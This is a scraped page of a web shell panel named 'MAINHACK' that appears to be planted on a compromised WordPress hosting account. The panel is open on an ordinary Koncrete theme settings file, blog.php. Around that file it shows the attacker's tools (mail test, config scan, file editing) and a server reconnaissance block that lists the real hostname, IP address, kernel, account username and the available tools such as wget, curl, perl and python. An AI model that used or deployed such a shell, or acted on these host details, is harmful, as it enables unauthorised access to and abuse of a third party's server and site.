[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: blog.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.0 */ namespace radiustheme\Koncrete; use \Redux; $opt_name = Constants::$theme_options; Redux::setSection( $opt_name, array( 'title' => esc_html__( 'Blog Settings', 'koncrete' ), 'id' => 'blog_settings_section', 'icon' => 'el el-tags', 'heading' => '', 'fields' => array( array( 'id' => 'blog_date', 'type' => 'switch', 'title' => esc_html__( 'Display Date', 'koncrete' ), 'on' => esc_html__( 'On', 'koncrete' ), 'off' => esc_html__( 'Off', 'koncrete' ), 'default' => true, ), array( 'id' => 'blog_author_name', 'type' => 'switch', 'title' => esc_html__( 'Display Author Name', 'koncrete' ), 'on' => esc_html__( 'On', 'koncrete' ), 'off' => esc_html__( 'Off', 'koncrete' ), 'default' => true, ), array( 'id' => 'blog_comment_num', 'type' => 'switch', 'title' => esc_html__( 'Display Comment Number', 'koncrete' ), 'on' => esc_html__( 'On', 'koncrete' ), 'off' => esc_html__( 'Off', 'koncrete' ), 'default' => true, ), array( 'id' => 'blog_cats', 'type' => 'switch', 'title' => esc_html__( 'Display Categories', 'koncrete' ), 'on' => esc_html__( 'On', 'koncrete' ), 'off' => esc_html__( 'Off', 'koncrete' ), 'default' => true, ), array( 'id' => 'blog_read_more_text', 'type' => 'text', 'title' => esc_html__( 'Blog ', 'koncrete' ), 'title' => esc_html__( 'Read more text for blog archive page', 'koncrete' ), 'default' => 'Continue Reading', ), ) ) );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.69 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: 1154